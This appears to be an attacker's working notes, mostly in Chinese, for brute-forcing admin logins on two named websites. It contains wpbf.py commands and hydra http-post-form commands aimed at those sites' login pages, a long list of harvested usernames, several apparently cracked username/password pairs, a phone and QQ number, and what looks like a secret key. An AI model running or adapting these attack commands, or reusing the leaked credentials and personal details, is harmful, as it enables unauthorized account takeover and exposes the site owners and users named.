while 

wpbf.py 是专门跑WordPress系统的
./wpbf.py --nokeywords  http://www.fulibaike.cc/
./wpbf.py -eu http://www.fulibaike.cc/

可以用hydra程序跑

hydra -L username.txt -P wordlist.txt -o ok.lst -t 10 -f -v http://www.myhhg.info/ http-post-form "admin.php:admin_name=^USER^&admin_pwd=^PASS^:<br><br><br><br><br></td></tr>"
hydra -L username.txt -P wordlist.txt -o ok.lst -t 10 -f -v http://www.myhhg.info/ http-post-form "/admin.php:admin_name=^USER^&admin_pwd=^PASS^:<br><br><br><br><br></td></tr>"
hydra -L username.txt -P wordlist.txt -o ok.lst -t 10 -f -v www.myhhg.info http-post-form "/admin.php:admin_name=^USER^&admin_pwd=^PASS^:<br><br><br><br><br></td></tr>"

也可以用自己些的程序跑
wordlist.txt   默认几个密码
05.txt  *****牛逼的常用密码

获得用户名
./getusername.php 
跑暴力
./3wpbf.py 


tel:18622861561,qq:2543181120

12345679

ekids, jasenshen, a807864815, 1024, slience610, xinghuoyao, a67368764, q251748817, zjkk0822, ericsonowen, goldengo, 1989847358, jinchunyou, dc835689021, zhoujozj, zjkk0820, xubenyi, junybaby, lxdl01, yuankk7676, hualuoshuiliu, dongd77, qwe9630, asaraeuxodiphoxf, brightchl, sjlttyy, 6566, qwe524, edsgdgs, fdgdgf, xiaohaox15, yulejia0113, sgsky0, iceeif, lekman, wj85555, caoshenmedan, caoshenmedan110, sbcsbc, abc2015, chadashu, 1667357002, redsuns007, williamking, w1731905189, az1220, fjz2008s, jkui520, qwerqian, acer7676, qwerqian1, lgwhx, ace07, 869508587, 472630117, baitian84662, hflame, lengqing, lang, lang95, littlespend, mayday, fuoki, jjkpoi, losth2001, qwassdzx, you774774, spartace, blue_sex, gong643, 1300, meiyoucj, sex8, 845810107xc, mazouri, shuiger, yutian0412, ikeny, 58611408, lf666016, hawk, s58611408, xinwu, xiangdiaoxeo, 36897184, xiaohulu, 648725879, xdxd23, qq651267797, garoter, kakaka, sy3324330, wangxing, qq5622005, 1036191773, zqy1036191773, 1329333142, yulijia, a1231555666, chenjingwow, zhaozhao, xlianglong, 1123755, 1123755938, zhl123000, 8wy761443, 542562322, yjj, zhonghuataibei, lzssww, lz5566, cain87, yeniao7788, z2177562, zhao800153, usnk168, jack3954112, moore5859, dehanbing, rmiri, skaldwang, zcw626, dream47, m80, feilong96, saki, yjj798, 35896527, lusir, wakaka, rain629, hsxwoa, zzq060625010, hehui200, jason221, waf20022003, fatlin110, wa3203, y504808580, xwycjie, wolaileqq, dok2, joewill7, oneeone, xcw778655, linshunan, spotem21, chen12


xiaohulu 
http://www.fulibaike.cc/ 


farley, 111111
duanzeyu 111111
laden7279 123321123
日日月月 123456
demonxiao 123456
tmq0815 123456


600959 江苏有线
300447 全信股份

BICQ7QB4CNJ5SBFB6EEIZVPL4QSI6MKLV

